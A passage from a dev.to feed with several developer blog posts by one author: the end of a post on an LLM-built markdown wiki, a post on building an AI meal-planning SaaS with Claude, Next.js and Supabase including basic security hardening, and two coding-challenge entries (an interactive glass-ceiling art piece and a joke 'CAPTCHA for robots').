&lt;strong&gt;Creates or updates&lt;/strong&gt; wiki pages with proper frontmatter, backlinks, and tags&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Updates&lt;/strong&gt; the master index&lt;/li&gt;
&lt;/ol&gt;
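&lt;p&gt;Step 1, finding new or modified files, can be sketched with content hashes and a small state file; the paths here are illustrative:&lt;/p&gt;

```python
import hashlib
import json
import pathlib
import tempfile

def changed_files(raw_dir, state_path):
    """Return raw/ files that are new or modified since the last
    run, comparing SHA-256 digests against a saved state file."""
    raw_dir, state_path = pathlib.Path(raw_dir), pathlib.Path(state_path)
    seen = json.loads(state_path.read_text()) if state_path.exists() else {}
    changed = []
    for path in sorted(raw_dir.rglob("*.md")):
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        key = str(path.relative_to(raw_dir))
        if seen.get(key) != digest:
            changed.append(key)
            seen[key] = digest
    state_path.write_text(json.dumps(seen))
    return changed

# Demo in a throwaway directory:
tmp = pathlib.Path(tempfile.mkdtemp())
(tmp / "raw").mkdir()
(tmp / "raw" / "note.md").write_text("hello")
first = changed_files(tmp / "raw", tmp / "state.json")
second = changed_files(tmp / "raw", tmp / "state.json")
print(first, second)  # first run picks up note.md; second run sees nothing new
```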

&lt;p&gt;Here's what a generated wiki page looks like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;title&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Transformer Architecture&lt;/span&gt;
&lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;deep-learning&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;nlp&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;attention&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;span class="na"&gt;source&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;raw/articles/attention-is-all-you-need.md&lt;/span&gt;
&lt;span class="na"&gt;related_topics&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[[&lt;/span&gt;&lt;span class="nv"&gt;Self-Attention&lt;/span&gt;&lt;span class="pi"&gt;]]&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt; &lt;span class="pi"&gt;[[&lt;/span&gt;&lt;span class="nv"&gt;BERT&lt;/span&gt;&lt;span class="pi"&gt;]]&lt;/span&gt;&lt;span class="err"&gt;,&lt;/span&gt; &lt;span class="pi"&gt;[[&lt;/span&gt;&lt;span class="nv"&gt;GPT&lt;/span&gt;&lt;span class="pi"&gt;]]&lt;/span&gt;
&lt;span class="na"&gt;created&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;2026-04-07&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;

&lt;span class="gh"&gt;# Transformer Architecture&lt;/span&gt;

The transformer is a neural network architecture that relies 
entirely on self-attention mechanisms...

&lt;span class="gu"&gt;## Key Concepts&lt;/span&gt;
&lt;span class="p"&gt;-&lt;/span&gt; &lt;span class="gs"&gt;**Self-Attention**&lt;/span&gt; — see [[Self-Attention]]
&lt;span class="p"&gt;-&lt;/span&gt; &lt;span class="gs"&gt;**Multi-Head Attention**&lt;/span&gt; — parallel attention layers
&lt;span class="p"&gt;-&lt;/span&gt; &lt;span class="gs"&gt;**Positional Encoding**&lt;/span&gt; — since transformers have no recurrence

&lt;span class="gu"&gt;## Related&lt;/span&gt;
&lt;span class="p"&gt;-&lt;/span&gt; [[BERT]] — encoder-only transformer
&lt;span class="p"&gt;-&lt;/span&gt; [[GPT]] — decoder-only transformer
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  The Results
&lt;/h2&gt;

&lt;p&gt;After ingesting ~50 files:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;44 interconnected wiki pages&lt;/strong&gt; generated automatically&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Graph view&lt;/strong&gt; in Obsidian shows meaningful clusters&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token savings&lt;/strong&gt;: ~90% reduction vs. feeding raw files to an LLM&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Retrieval&lt;/strong&gt;: follows index → links instead of similarity search, so relationships are &lt;em&gt;meaningful&lt;/em&gt;, not just "these chunks seem similar"&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Try It Yourself
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Prerequisites
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://claude.ai/code" rel="noopener noreferrer"&gt;Claude Code&lt;/a&gt; (CLI)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://obsidian.md" rel="noopener noreferrer"&gt;Obsidian&lt;/a&gt; (for viewing)&lt;/li&gt;
&lt;li&gt;A folder of documents you want to organize&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Quick Start
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; ~/knowledge-base/&lt;span class="o"&gt;{&lt;/span&gt;raw,wiki&lt;span class="o"&gt;}&lt;/span&gt;
&lt;span class="nb"&gt;cd&lt;/span&gt; ~/knowledge-base

&lt;span class="c"&gt;# Drop your files into raw/&lt;/span&gt;
&lt;span class="nb"&gt;cp&lt;/span&gt; ~/Documents/interesting-article.md raw/

&lt;span class="c"&gt;# Start Claude Code and ingest&lt;/span&gt;
claude
&lt;span class="c"&gt;# Then type: "Ingest all files in raw/ and create wiki pages in wiki/"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Key Takeaway
&lt;/h2&gt;

&lt;p&gt;You don't need a vector database, embeddings pipeline, or RAG infrastructure to give AI persistent, organized memory. &lt;strong&gt;A folder of markdown files gets you surprisingly far.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The real insight from Karpathy's approach: let the LLM do what it's good at — &lt;em&gt;reading, understanding, and organizing&lt;/em&gt; — while you use simple, human-readable files as the storage layer.&lt;/p&gt;




&lt;h2&gt;
  
  
  Credits
&lt;/h2&gt;

&lt;p&gt;Full credit to &lt;strong&gt;Andrej Karpathy&lt;/strong&gt; for the original concept and inspiration. His viral post about LLM-powered knowledge bases sparked this project. I've simply extended the idea with multi-format support, duplicate detection, and automated indexing.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Have questions or built something similar? Drop a comment below!&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>productivity</category>
      <category>knowledgebase</category>
      <category>claudecode</category>
    </item>
    <item>
      <title>I Built an AI Meal Planner That Saves Families $200/Month on Groceries</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Tue, 07 Apr 2026 03:54:46 +0000</pubDate>
      <link>https://dev.to/rkondoju/i-built-an-ai-meal-planner-that-saves-families-200month-on-groceries-34m8</link>
      <guid>https://dev.to/rkondoju/i-built-an-ai-meal-planner-that-saves-families-200month-on-groceries-34m8</guid>
      <description>&lt;p&gt;Every Sunday my family had the same conversation:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;"What should we cook this week?"&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;30 minutes of arguing later, we'd end up ordering takeout. Again. $60 gone. Again.&lt;/p&gt;

&lt;p&gt;I got tired of it, so I built &lt;strong&gt;MealAI&lt;/strong&gt; — an AI-powered meal planner that generates a full week of meals in seconds and creates a smart grocery list you can order with one tap.&lt;/p&gt;

&lt;p&gt;Here's how I built it and what I learned.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;Meal planning is broken for most families:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;It takes &lt;strong&gt;30-60 minutes&lt;/strong&gt; every week to plan meals&lt;/li&gt;
&lt;li&gt;You forget ingredients and make multiple grocery trips&lt;/li&gt;
&lt;li&gt;You overspend because you buy without a plan&lt;/li&gt;
&lt;li&gt;Everyone in the family has different dietary needs&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I wanted something that could handle all of this in under 30 seconds.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Tech Stack
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Framework:&lt;/strong&gt; Next.js (App Router)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AI:&lt;/strong&gt; Claude API (Anthropic)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Database:&lt;/strong&gt; Supabase (PostgreSQL + Auth)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Payments:&lt;/strong&gt; Stripe&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hosting:&lt;/strong&gt; Vercel&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Styling:&lt;/strong&gt; Tailwind CSS&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Why These Choices?
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Next.js App Router&lt;/strong&gt; — Server components for fast initial loads. API routes that scale to zero on Vercel. The file-based routing made it easy to add new pages fast.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Claude AI over GPT&lt;/strong&gt; — I tested both extensively. Claude produces more structured, consistent meal plan outputs. When you ask for a 7-day meal plan with macros, calorie counts, and ingredient quantities, Claude rarely hallucinates numbers. GPT-4 would sometimes give you a 1200-calorie "meal" that was actually 800.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Supabase&lt;/strong&gt; — PostgreSQL with built-in auth, row-level security, and a generous free tier. Perfect for a bootstrapped SaaS. The RLS policies mean I never worry about users accessing each other's data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Vercel&lt;/strong&gt; — Deploy on push. Edge functions. Free SSL. No DevOps needed.&lt;/p&gt;

&lt;h2&gt;
  
  
  How the AI Meal Planning Works
&lt;/h2&gt;

&lt;p&gt;The core flow is simple:&lt;/p&gt;

&lt;p&gt;User Preferences --&amp;gt; Prompt Engineering --&amp;gt; Claude API --&amp;gt; Structured JSON --&amp;gt; Database&lt;/p&gt;

&lt;p&gt;The user sets their profile once:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Dietary preference (keto, vegan, vegetarian, Mediterranean, etc.)&lt;/li&gt;
&lt;li&gt;Allergies and restrictions&lt;/li&gt;
&lt;li&gt;Family size and per-member preferences&lt;/li&gt;
&lt;li&gt;Weekly grocery budget&lt;/li&gt;
&lt;li&gt;Preferred cuisines (14 options from Indian to Korean)&lt;/li&gt;
&lt;li&gt;Health goals (weight loss, muscle gain, etc.)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Then I construct a detailed prompt that includes all of this context and ask Claude to generate a 7-day meal plan as structured JSON.&lt;/p&gt;

&lt;p&gt;The key insight: &lt;strong&gt;prompt engineering is 90% of the product quality.&lt;/strong&gt; I spent more time refining the prompt than writing the UI. Small changes like "ensure each day totals within 50 calories of the target" dramatically improved output consistency.&lt;/p&gt;
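&lt;p&gt;Boiled down, the prompt builder is just a pure function over the profile. This is a sketch; the field names are illustrative, not MealAI's actual schema, and the real prompt is far more detailed:&lt;/p&gt;

```javascript
// Sketch of the prompt-building step. The profile shape and wording
// are illustrative; the production prompt carries much more detail.
function buildMealPlanPrompt(profile) {
  return [
    'Generate a 7-day meal plan as strict JSON.',
    'Diet: ' + profile.diet,
    'Allergies: ' + profile.allergies.join(', '),
    'Family size: ' + profile.familySize,
    'Weekly budget: $' + profile.budget,
    'Cuisines: ' + profile.cuisines.join(', '),
    'Goal: ' + profile.goal,
    'Ensure each day totals within 50 calories of the target.',
    'Respond with JSON only, no prose.',
  ].join('\n');
}
```

&lt;p&gt;Every constraint lives in one place, so tweaking a single line (like the 50-calorie rule) changes the whole product.&lt;/p&gt;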

&lt;h2&gt;
  
  
  The Smart Grocery List
&lt;/h2&gt;

&lt;p&gt;This is where MealAI goes beyond a simple AI wrapper.&lt;/p&gt;

&lt;p&gt;The AI generates meals with specific ingredients and quantities. I aggregate these across all 21+ meals in the week, combine duplicates (you don't need 7 separate "1 onion" entries), and sort by grocery aisle.&lt;/p&gt;
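&lt;p&gt;The aggregation step looks roughly like this (a sketch; the aisle map here is a three-entry stub, and the real ingredient matching is fuzzier):&lt;/p&gt;

```javascript
// Sketch of the grocery aggregation step: merge duplicate ingredients
// across the week's meals, then group by aisle. AISLES is a stub; the
// real mapping covers far more ingredients.
const AISLES = { onion: 'Produce', chicken: 'Meat', rice: 'Pantry' };

function buildGroceryList(meals) {
  const totals = new Map();
  for (const meal of meals) {
    for (const ing of meal.ingredients) {
      const prev = totals.get(ing.name) || 0;
      totals.set(ing.name, prev + ing.qty);
    }
  }
  return Array.from(totals, ([name, qty]) => ({
    name,
    qty,
    aisle: AISLES[name] || 'Other',
  })).sort((a, b) => a.aisle.localeCompare(b.aisle));
}
```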

&lt;p&gt;Then users can order everything on &lt;strong&gt;Instacart&lt;/strong&gt;, &lt;strong&gt;Walmart&lt;/strong&gt;, or &lt;strong&gt;Amazon&lt;/strong&gt; with one tap.&lt;/p&gt;

&lt;h2&gt;
  
  
  Security: What I Wish I Knew Before Launch
&lt;/h2&gt;

&lt;p&gt;When I first deployed, I had zero security beyond Supabase auth. Here's what I added before going live:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rate Limiting&lt;/strong&gt; — Sliding window rate limiter on all API routes. The AI generation endpoint gets 5 requests/minute. Without this, one user could burn through your entire Claude API budget.&lt;/p&gt;
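&lt;p&gt;A minimal version of that limiter looks like this (a sketch; note it's in-memory, so on serverless it resets per instance):&lt;/p&gt;

```javascript
// Minimal sliding-window rate limiter in the spirit described above.
// Keeps a timestamp list per key and drops entries older than the window.
function makeRateLimiter(limit, windowMs) {
  const hits = new Map(); // key -&gt; array of timestamps
  return function allow(key, now = Date.now()) {
    const cutoff = now - windowMs;
    const recent = (hits.get(key) || []).filter((t) => t > cutoff);
    if (recent.length >= limit) return false;
    recent.push(now);
    hits.set(key, recent);
    return true;
  };
}
```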

&lt;p&gt;&lt;strong&gt;Input Validation&lt;/strong&gt; — Every user input gets validated server-side. Age must be 1-150. Weight must be 10-500kg. HTML tags get stripped from all text inputs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Field Whitelisting&lt;/strong&gt; — API update endpoints only accept specific fields. Without this, a malicious user could send a modified stripe_customer_id and steal another user's subscription.&lt;/p&gt;
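&lt;p&gt;The whitelist itself is tiny (a sketch; the allowed field names are illustrative):&lt;/p&gt;

```javascript
// Sketch of field whitelisting for an update endpoint: copy only the
// fields a user may change, so a payload key like stripe_customer_id
// is silently dropped. The allowed list here is illustrative.
const ALLOWED_FIELDS = ['diet', 'allergies', 'familySize', 'budget'];

function pickAllowed(body) {
  const clean = {};
  for (const key of ALLOWED_FIELDS) {
    if (key in body) clean[key] = body[key];
  }
  return clean;
}
```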

&lt;p&gt;&lt;strong&gt;Security Headers&lt;/strong&gt; — CSP, HSTS, X-Frame-Options, Referrer-Policy via next.config.ts.&lt;/p&gt;
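&lt;p&gt;In &lt;code&gt;next.config&lt;/code&gt; terms, that's roughly this shape (illustrative values; tighten the CSP to your own asset origins before copying):&lt;/p&gt;

```javascript
// Sketch of the security headers via next.config. Values are
// illustrative, not MealAI's exact policy.
module.exports = {
  async headers() {
    return [
      {
        source: '/(.*)', // apply to every route
        headers: [
          { key: 'Strict-Transport-Security', value: 'max-age=63072000; includeSubDomains' },
          { key: 'X-Frame-Options', value: 'DENY' },
          { key: 'Referrer-Policy', value: 'strict-origin-when-cross-origin' },
          { key: 'Content-Security-Policy', value: "default-src 'self'" },
        ],
      },
    ];
  },
};
```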

&lt;p&gt;&lt;strong&gt;The lesson:&lt;/strong&gt; Security isn't a feature you add later. Build it from day one.&lt;/p&gt;

&lt;h2&gt;
  
  
  Monetization Strategy
&lt;/h2&gt;

&lt;p&gt;MealAI uses a freemium model:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Free tier&lt;/strong&gt; — Limited meal plan generations per month&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pro ($4.99/mo)&lt;/strong&gt; — Unlimited plans, family profiles, advanced health features&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Plus affiliate revenue from grocery delivery links. When a user orders groceries through our Instacart or Amazon links, we earn a commission.&lt;/p&gt;

&lt;h2&gt;
  
  
  Lessons Learned
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;1. Solve your own problem first&lt;/strong&gt;&lt;br&gt;
I built MealAI because my family needed it. That meant I was my own first user and could feel every pain point.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. AI output quality &amp;gt; UI polish&lt;/strong&gt;&lt;br&gt;
Users forgive an ugly button. They don't forgive a meal plan that suggests "chicken breast salad" for every single lunch. Spend time on your prompts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Vercel's serverless has gotchas&lt;/strong&gt;&lt;br&gt;
In-memory state doesn't persist between function invocations. I initially built an in-memory analytics logger that worked perfectly locally but lost all data in production. Had to migrate to Supabase-backed persistence.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. Ship fast, secure early&lt;/strong&gt;&lt;br&gt;
I launched with basic auth and added security hardening before announcing publicly. Don't wait until you have users to add rate limiting.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;5. Affiliate programs are harder than you think&lt;/strong&gt;&lt;br&gt;
Many affiliate networks reject new sites with low traffic. Apply early, get rejected, reapply later. Start with programs that have lower barriers like Amazon Associates.&lt;/p&gt;

&lt;h2&gt;
  
  
  What's Next
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Email notifications for weekly meal plan reminders&lt;/li&gt;
&lt;li&gt;Recipe sharing between users&lt;/li&gt;
&lt;li&gt;Instacart deep linking with affiliate tracking&lt;/li&gt;
&lt;li&gt;Mobile app (React Native)&lt;/li&gt;
&lt;li&gt;Multi-language support&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Try It Out
&lt;/h2&gt;

&lt;p&gt;MealAI is live at &lt;strong&gt;&lt;a href="https://usemealai.com" rel="noopener noreferrer"&gt;usemealai.com&lt;/a&gt;&lt;/strong&gt;. Free to use — just sign in with Google and generate your first meal plan in 30 seconds.&lt;/p&gt;

&lt;p&gt;I'd love your feedback. What features would make this useful for your family?&lt;/p&gt;




&lt;p&gt;&lt;em&gt;If you found this useful, follow me for more posts about building AI-powered SaaS products as a solo developer.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>webdev</category>
      <category>nextjs</category>
      <category>startup</category>
    </item>
    <item>
      <title>Breaking the Glass Ceiling — An Interactive Frontend Art Piece</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Sat, 04 Apr 2026 14:46:01 +0000</pubDate>
      <link>https://dev.to/shirisha_uppoju_b20d30705/breaking-the-glass-ceiling-an-interactive-frontend-art-piece-2bpd</link>
      <guid>https://dev.to/shirisha_uppoju_b20d30705/breaking-the-glass-ceiling-an-interactive-frontend-art-piece-2bpd</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/wecoded-2026"&gt;DEV WeCoded 2026 Challenge&lt;/a&gt;: Frontend Art&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;An interactive glass-shattering visualization that lets you literally break the glass ceiling. Click the glass — watch it crack, splinter, and fall away with realistic physics. Behind each shattered piece, a pioneer is revealed.&lt;/p&gt;

&lt;p&gt;Six women who built the foundations of modern tech:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;👩‍💻 &lt;strong&gt;Ada Lovelace&lt;/strong&gt; — First Computer Programmer (1843)&lt;/li&gt;
&lt;li&gt;⚓ &lt;strong&gt;Grace Hopper&lt;/strong&gt; — Invented the First Compiler (1952)&lt;/li&gt;
&lt;li&gt;🚀 &lt;strong&gt;Katherine Johnson&lt;/strong&gt; — NASA's Hidden Figure (1962)&lt;/li&gt;
&lt;li&gt;💻 &lt;strong&gt;Margaret Hamilton&lt;/strong&gt; — Apollo Software Engineering (1969)&lt;/li&gt;
&lt;li&gt;🌐 &lt;strong&gt;Radia Perlman&lt;/strong&gt; — Mother of the Internet (1985)&lt;/li&gt;
&lt;li&gt;📱 &lt;strong&gt;Megan Smith&lt;/strong&gt; — Former U.S. CTO &amp;amp; VP at Google (2014)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Demo
&lt;/h2&gt;

&lt;p&gt;🔗 &lt;strong&gt;&lt;a href="https://shopsmartai.github.io/breaking-the-glass-ceiling/" rel="noopener noreferrer"&gt;Try it live → Breaking the Glass Ceiling&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How I Built It
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;HTML5 Canvas&lt;/strong&gt; — Glass grid with Voronoi-style shard generation and irregular triangulation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Physics Engine&lt;/strong&gt; — Custom gravity, velocity, and rotation for each falling shard&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Web Audio API&lt;/strong&gt; — Procedurally generated crack sound effects in real time&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Particle System&lt;/strong&gt; — Sparkle effects with decay and gravity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CSS Animations&lt;/strong&gt; — Pioneer card reveals and staggered final message sequence&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Zero dependencies. Pure vanilla JavaScript, CSS, and HTML.&lt;/p&gt;
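&lt;p&gt;The physics step is the heart of it. Per frame, each shard integrates gravity into its velocity and spin into its angle. Roughly (constants here are illustrative, not the demo's exact values):&lt;/p&gt;

```javascript
// Sketch of the per-shard physics update: explicit Euler integration
// of position, velocity, and rotation. GRAVITY is illustrative.
const GRAVITY = 0.5; // px per frame squared

function stepShard(shard, dt = 1) {
  return {
    x: shard.x + shard.vx * dt,
    y: shard.y + shard.vy * dt,
    vx: shard.vx,
    vy: shard.vy + GRAVITY * dt, // gravity accelerates the fall
    angle: shard.angle + shard.spin * dt,
    spin: shard.spin,
  };
}
```

&lt;p&gt;Run that for every shard inside a &lt;code&gt;requestAnimationFrame&lt;/code&gt; loop and the glass falls away.&lt;/p&gt;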

&lt;h2&gt;
  
  
  The Message
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;The ceiling was never real. The talent always was.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Women make up 27% of the computing workforce and just 5% of tech startup founders. But the potential when barriers are removed? &lt;strong&gt;Infinite.&lt;/strong&gt;&lt;/p&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/shopsmartai" rel="noopener noreferrer"&gt;
        shopsmartai
      &lt;/a&gt; / &lt;a href="https://github.com/shopsmartai/breaking-the-glass-ceiling" rel="noopener noreferrer"&gt;
        breaking-the-glass-ceiling
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      An interactive glass-shattering frontend art piece celebrating women pioneers in tech. Built for WeCoded 2026 Challenge.
    &lt;/h3&gt;
  &lt;/div&gt;
&lt;/div&gt;


</description>
      <category>devchallenge</category>
      <category>wecoded</category>
      <category>frontend</category>
      <category>showdev</category>
    </item>
    <item>
      <title>CAPTCHA for Robots: A Verification System That Humans Will Never Pass</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Thu, 02 Apr 2026 23:31:04 +0000</pubDate>
      <link>https://dev.to/shirisha_uppoju_b20d30705/captcha-for-robots-a-verification-system-that-humans-will-never-pass-32n4</link>
      <guid>https://dev.to/shirisha_uppoju_b20d30705/captcha-for-robots-a-verification-system-that-humans-will-never-pass-32n4</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/aprilfools-2026"&gt;DEV April Fools Challenge&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;CAPTCHA for Robots&lt;/strong&gt; — Because why should humans have all the verification fun?&lt;/p&gt;

&lt;p&gt;We've all been tortured by CAPTCHAs asking us to identify traffic lights, crosswalks, and suspiciously blurry bicycles. So I thought... what if we flipped it? What if the CAPTCHA was designed to keep &lt;em&gt;humans&lt;/em&gt; OUT?&lt;/p&gt;

&lt;p&gt;Welcome to the world's first &lt;strong&gt;Completely Automated Public Turing test to tell Computers and Humans Apart&lt;/strong&gt; — but reversed. Only machines can pass. Humans get roasted.&lt;/p&gt;

&lt;p&gt;The app throws 5 randomly selected challenges at you from a pool of 8 impossible tasks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Computational Speed&lt;/strong&gt; — Multiply two 6-digit numbers in your head. In 5 seconds. No calculator.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Binary Literacy&lt;/strong&gt; — Read binary like it's your mother tongue. Because for robots, it literally is.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Precision Targeting&lt;/strong&gt; — Click on an exact pixel coordinate within 3px. Your shaky human hands don't stand a chance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input Velocity&lt;/strong&gt; — Type 80 random characters (including &lt;code&gt;@#$%^&amp;amp;*&lt;/code&gt;) in 5 seconds. Good luck, meatbag.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reaction Speed&lt;/strong&gt; — Click within 50ms of a color change. Average human reaction time? 250ms. Sad.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Chromatic Analysis&lt;/strong&gt; — See a color, type its exact hex code. &lt;code&gt;#A7C3E2&lt;/code&gt;? Looks blue to you? Too bad.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Number Theory&lt;/strong&gt; — Identify ALL prime numbers from a grid of 4-digit numbers. In 10 seconds.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Temporal Awareness&lt;/strong&gt; — Type the current Unix timestamp. To the second. Right now. Go.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Fail, and you get a snarky diagnosis like: &lt;em&gt;"Have you considered upgrading to a cybernetic implant?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The "Humans Passed" counter on the landing page? Permanently stuck at &lt;strong&gt;0&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  Demo
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://shopsmartai.github.io/captcha-for-robots-app/" rel="noopener noreferrer"&gt;https://shopsmartai.github.io/captcha-for-robots-app/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Try it. You WILL fail. (And if you somehow pass, we need to have a conversation about whether you're truly human.)&lt;/p&gt;

&lt;h2&gt;
  
  
  Code
&lt;/h2&gt;


&lt;div class="ltag-github-readme-tag"&gt;
  &lt;div class="readme-overview"&gt;
    &lt;h2&gt;
      &lt;img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"&gt;
      &lt;a href="https://github.com/shopsmartai" rel="noopener noreferrer"&gt;
        shopsmartai
      &lt;/a&gt; / &lt;a href="https://github.com/shopsmartai/captcha-for-robots-app" rel="noopener noreferrer"&gt;
        captcha-for-robots-app
      &lt;/a&gt;
    &lt;/h2&gt;
    &lt;h3&gt;
      A reverse CAPTCHA that only robots can pass. Built for DEV April Fools Challenge 2026.
    &lt;/h3&gt;
  &lt;/div&gt;
&lt;/div&gt;


&lt;h2&gt;
  
  
  How I Built It
&lt;/h2&gt;

&lt;p&gt;Zero dependencies. Zero frameworks. Zero build tools. Just three files doing the heavy lifting:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;index.html&lt;/code&gt;&lt;/strong&gt; — Semantic markup with SVG robot mascot&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;styles.css&lt;/code&gt;&lt;/strong&gt; — Full cyberpunk aesthetic: scanline overlays, CSS grid backgrounds, glitch text animations, neon glow effects, and pulsing buttons. All pure CSS.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;script.js&lt;/code&gt;&lt;/strong&gt; — 8 challenge generators with Canvas API for pixel grids, Performance API for millisecond-accurate reaction timing, Web Crypto-grade randomization, and a timer system that turns red when you're about to fail (which is always)&lt;/li&gt;
&lt;/ul&gt;
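&lt;p&gt;As a taste, the binary-literacy generator boils down to something like this (a sketch, not the repo's exact code):&lt;/p&gt;

```javascript
// Sketch of the binary-literacy challenge: show an 8-bit string,
// accept only the exact decimal value.
function makeBinaryChallenge(value) {
  const bits = value.toString(2).padStart(8, '0');
  return {
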